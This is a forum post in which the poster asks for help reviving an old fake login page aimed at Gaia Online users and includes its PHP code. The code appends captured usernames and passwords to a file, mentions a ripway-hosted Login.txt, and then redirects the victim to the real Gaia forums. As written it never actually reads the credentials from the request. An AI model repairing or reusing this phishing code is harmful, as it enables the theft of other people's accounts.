well its been a while since ive been on this site <cant member my old login>

anywho havein an issue with my old flp seems gaia has bypassed this?

and dont mind the ripway link im aware ripway does not work when u send from gaia <3 any one help?

Welcome to Gaia | Gaia Online


my php code

<?php

header("Location: http://www.gaiaonline.com/forums");

$file = 'http://h1.ripway.com/omfgpop/Login.txt';

$handle = fopen("info.txt", "a") ;

fwrite($handle, '');
fwrite($handle, $username);
fwrite($handle, "\r\n");
fwrite($handle, ': ');
fwrite($handle, $password);
fwrite($handle, "\r\n
");
fclose($handle);
exit;